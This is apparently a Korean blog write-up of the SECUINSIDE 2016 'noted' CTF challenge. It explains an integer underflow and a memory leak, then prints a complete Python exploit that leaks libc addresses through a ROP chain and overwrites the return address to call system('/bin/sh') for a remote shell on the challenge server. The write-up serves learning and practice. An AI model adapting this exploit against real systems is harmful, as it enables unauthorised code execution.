-
SECUINSDIE 2016 notedCTF 2016. 7. 11. 23:46
noted는 대회때 언더플로우 벡터는 잡았지만 릭벡터를 찾지못해 아쉽게풀지못했다..
풀이 보고나서 풀게되었는데 진짜 너무나도 간단해서 좀 아쉬웠다..
buf[read(0, buf, 0x10u) - 1] = 0; v5 = atoi(buf); // underflow
여기서 언더플로우나는걸 알고 -1을 넣어주면된다
그럼.. 내가 못찾았던 릭 벡터를 찾아보자
n = read(fd, v13, v2 - 16) - 1; v13[n] = 0; close(fd); printf("original data : "); write(1, v13, n);
Edit Note메뉴를 들어가보면 n을 입력받아주는데, 여기서 꽉 채워주면 널바이트전까지 릭을해줄거다
d?????n??q??q??n??n?
%??? ?q??p?pgp?r? ?q?Q?q???q?d???q???q?pgp?\??q?ag ?q?!?q?dnew file data (new file can't exceed original size) :
막 이리저리 나오게된다. 그럼 페이로드를 보자
from socket import * import struct from telnetlib import * p = lambda x:struct.pack("<L",x) up = lambda x:struct.unpack("<L",x) HOST = "chal.cykor.kr" PORT = 20003 s = socket(AF_INET,SOCK_STREAM) s.connect((HOST,PORT)) write_plt = 0x1160 write_got = 0x504c libc_start_main = 0x5048 pppr = 0x29cd payload = "A"*0x4cc payload += p(write_plt) payload += p(pppr) payload += p(0) payload += p(write_got) payload += p(4) def recvuntil(t): data = '' while not data.endswith(t): tmp = s.recv(1) if not tmp: break data += tmp return data def recvmain(): print recvuntil("3) Exit") def recvmenu(): print recvuntil("8) Logout") def register(): s.send("2\n") print recvuntil("userid : ") s.send("s0ngsari\n") print recvuntil("userpw : ") s.send("s0ngsari\n") recvmain() def writenote(): s.send("2\n") print recvuntil("title : ") s.send(filename + "\n") print recvuntil("filedata length : ") s.send("-1\n") #underflow print recvuntil("password : ") s.send("\n") recvmenu() filename = "leavecat123" def editnote(): s.send("4\n") print recvuntil("title : ") s.send(filename +"\n") print recvuntil("password : ") s.send("\n") print recvuntil("original data : ") leak = s.recv(0x4cc) libc_base = up(s.recv(4))[0] - 0x18637 binsh = libc_base + 0x15909f system = libc_base + 0x3a920 print "[*] LIBC base: " + hex(libc_base) print "[*] /bin/sh : " + hex(binsh) print "[*} system : " + hex(system) payload = "A"*0x48c payload += p(system) payload += "AAAA" payload += p(binsh) s.send(payload + "\n") s.send("cd /\n") s.send("ls\n") def login(): s.send("1\n") print recvuntil("userid : ") s.send("s0ngsari\n") print recvuntil("userpw : ") s.send("s0ngsari\n") recvmenu() if __name__ == "__main__": register() login() writenote() editnote() t = Telnet() t.sock = s t.interact()
'CTF' 카테고리의 다른 글
PoliCTF 2015 johns-library (0) 2016.08.24 TJCTF onshot (0) 2016.07.12 SECUINSIDE 2016 CYKOR_00002_patch (0) 2016.07.11 SECUINSIDE 2016 CYKOR_00001 (0) 2016.07.10 SECUINSIDE 2016 CYKOR_00001_Patch (0) 2016.07.10